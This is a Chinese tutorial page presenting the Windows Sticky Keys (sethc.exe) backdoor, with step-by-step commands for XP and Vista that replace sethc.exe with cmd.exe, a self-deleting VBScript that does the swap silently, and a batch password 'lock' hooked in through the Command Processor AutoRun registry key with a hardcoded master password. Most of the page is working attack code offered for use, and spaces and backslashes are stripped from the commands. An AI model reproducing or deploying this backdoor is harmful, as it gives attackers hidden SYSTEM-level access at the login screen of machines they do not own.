变态入侵之有史以来最酷的Windows后门sethc.exe_安全教程-查字典教程网
变态入侵之有史以来最酷的Windows后门sethc.exe
变态入侵之有史以来最酷的Windows后门sethc.exe
发布时间:2016-12-26 来源:查字典编辑
摘要:后门原理:在windows2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以...

后门原理:

在windows2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

XP:

将安装源光盘弹出(或将硬盘上的安装目录改名)

cd%widnir%system32dllcache

rensethc.exe*.ex~

cd%widnir%system32

copy/ycmd.exesethc.exe

VISTA:

takeown/fc:windowssystem32sethc.exe

caclsc:windowssystem32sethc.exe/Gadministrator:F

然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmdshell,然后……

后门扩展:

复制代码 代码如下:

Dimobj,success

Setobj=CreateObject("WScript.Shell")

success=obj.run("cmd/ctakeown/f%SystemRoot%system32sethc.exe",0,True)

success=obj.run("cmd/cechoy|cacls%SystemRoot%system32sethc.exe/G%USERNAME%:F",0,True)

success=obj.run("cmd/ccopy%SystemRoot%system32cmd.exe%SystemRoot%system32acmd.exe",0,True)

success=obj.run("cmd/ccopy%SystemRoot%system32sethc.exe%SystemRoot%system32asethc.exe",0,True)

success=obj.run("cmd/cdel%SystemRoot%system32sethc.exe",0,True)

success=obj.run("cmd/cren%SystemRoot%system32acmd.exesethc.exe",0,True)

第二句最有意思了.自动应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...

复制代码 代码如下:

OnErrorResumeNext

Dimobj,success

Setobj=CreateObject("WScript.Shell")

success=obj.run("cmd/ctakeown/f%SystemRoot%system32sethc.exe&echoy|cacls%SystemRoot%system32sethc.exe/G%USERNAME%:F©%SystemRoot%system32cmd.exe%SystemRoot%system32acmd.exe©%SystemRoot%system32sethc.exe%SystemRoot%system32asethc.exe&del%SystemRoot%system32sethc.exe&ren%SystemRoot%system32acmd.exesethc.exe",0,True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

后门锁扩展:

allyesno注:可以采用cmd锁来进行cmdshell的密码验证

用下面的后门锁的方法是把代码保存为bdlock.bat

然后修改注册表位置即可

复制代码 代码如下:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommandProcessor]

"AutoRun"="bdlock.bat"

@EchoOff

title后门登陆验证

colora

cls

settemprandom=%RANDOM%

echo请输入验证码:%temprandom%

set/pcheck=

if"%check%"=="%temprandom%%temprandom%"gotopasscheck

if"%check%"=="%temprandom%"(

rem后门服务器验证

rem如果没有后门验证服务器请rem注释掉下一行代码

ifexist192.168.8.8backdoor$passgotopasscheck

)

echo验证失败

pause

exit

:passcheck

echo验证成功

If"%passcmdlock%"=="http://blog.csdn.net/freexploit/"Gotoendx

Setpasscmdlock=http://blog.csdn.net/freexploit/

:allyesno

SetErrorlevel=>nul

Echo请输入验证密码?

Setpassword=allyesnoIsapig>nul

Set/ppassword=

rem万能密码

if"%password%"=="allyesnoisasb"gotoendx

If%time:~1,1%==0Settimechange=a

If%time:~1,1%==1Settimechange=b

If%time:~1,1%==2Settimechange=c

If%time:~1,1%==3Settimechange=d

If%time:~1,1%==4Settimechange=e

If%time:~1,1%==5Settimechange=f

If%time:~1,1%==6Settimechange=g

If%time:~1,1%==7Settimechange=h

If%time:~1,1%==8Settimechange=i

If%time:~1,1%==9Settimechange=j

set/asum=%time:~1,1%+%time:~1,1%

Setpassword|findstr"^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul

If"%errorlevel%"=="0"cls&Echo口令正确&GotoEnd

Echo请联系客服咨询正确密码!&Gotoallyesno

:End

Setpassword=>nul

SetErrorlevel=>nul

Echo

:endx

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新安全教程学习
    热门安全教程学习
    实用技巧子分类